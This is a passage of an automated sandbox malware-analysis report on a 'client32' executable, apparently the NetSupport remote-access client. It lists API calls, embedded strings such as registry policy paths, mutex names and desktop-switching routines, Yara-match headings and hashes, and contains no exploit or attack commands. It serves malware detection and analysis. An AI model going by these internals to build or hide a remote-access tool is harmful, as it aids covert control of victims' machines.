                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                • API String ID: 3453649892-3803836183
                                                                                • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791

                                                                                Control-flow Graph (rendered graph not reproduced)
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostwsprintf
                                                                                • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                • API String ID: 875889313-3431570279
                                                                                • Opcode ID: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                                • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                • Opcode Fuzzy Hash: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                                • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                APIs
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                • InterlockedExchange.KERNEL32(012F8D80,00001388), ref: 110313BA
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                • API String ID: 1428277488-3745656997
                                                                                • Opcode ID: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                                • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                • Opcode Fuzzy Hash: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                                • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                • InterlockedExchange.KERNEL32(012F8D80,00001388), ref: 110313BA
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                • _sprintf.LIBCMT ref: 11031401
                                                                                • _setlocale.LIBCMT ref: 1103140B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                • API String ID: 4242130455-3745656997
                                                                                • Opcode ID: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                                • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                • Opcode Fuzzy Hash: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                                • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • wsprintfA.USER32 ref: 11028814
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                • wsprintfA.USER32 ref: 11028891
                                                                                • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                • API String ID: 512045693-419896573
                                                                                • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL,1B702977,03277FF0,03277FE0,?,00000000,1118368C,000000FF,?,11032002,03277FF0,00000000,?,?,?), ref: 11086115
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                • wsprintfA.USER32 ref: 110861EB
                                                                                • wsprintfA.USER32 ref: 11086202
                                                                                • wsprintfA.USER32 ref: 11086219
                                                                                • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085D68
                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085D7B
                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085D8E
                                                                                  • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085DA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                • API String ID: 4263811268-2492245516
                                                                                • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                APIs
                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                • API String ID: 2061479752-1320826866
                                                                                • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,1B702977,?,00000000,00000000), ref: 1102D594
                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                • API String ID: 83693535-1096744297
                                                                                • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                APIs
                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                • API String ID: 596640303-1725438197
                                                                                • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$Open$CloseValue
                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                • API String ID: 2823542970-1528906934
                                                                                • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • GetTickCount.KERNEL32 ref: 111385E2
                                                                                  • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                  • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                  • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                  • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                • GetTickCount.KERNEL32 ref: 111385F1
                                                                                • _memset.LIBCMT ref: 11138633
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                • _strrchr.LIBCMT ref: 11138658
                                                                                • _free.LIBCMT ref: 111386AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                • API String ID: 711243594-1270230032
                                                                                • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 11133B70
                                                                                • GetTickCount.KERNEL32 ref: 11133BA1
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe$.su
                                                                                • API String ID: 1170620360-2478739915
                                                                                • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                APIs
                                                                                  • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                  • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                  • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                  • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                  • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                  • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                                • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                                • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                                • GetDC.USER32(00000000), ref: 11134E13
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                • CreateWindowExA.USER32(00000001,NSMWClass,03260EA0,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                • API String ID: 1594747848-1114959992
                                                                                • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                APIs
                                                                                • _strtok.LIBCMT ref: 11027286
                                                                                • _strtok.LIBCMT ref: 110272C0
                                                                                • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$Sleep
                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                • API String ID: 2009458258-3774545468
                                                                                • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                APIs
                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                • GetLastError.KERNEL32 ref: 11103831
                                                                                • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                • GetLastError.KERNEL32 ref: 1110384F
                                                                                Strings
                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                • API String ID: 2036220054-60805735
                                                                                • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                APIs
                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                • GetLastError.KERNEL32 ref: 1115F275
                                                                                • wsprintfA.USER32 ref: 1115F288
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                • API String ID: 1734919802-1728070458
                                                                                • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
APIs
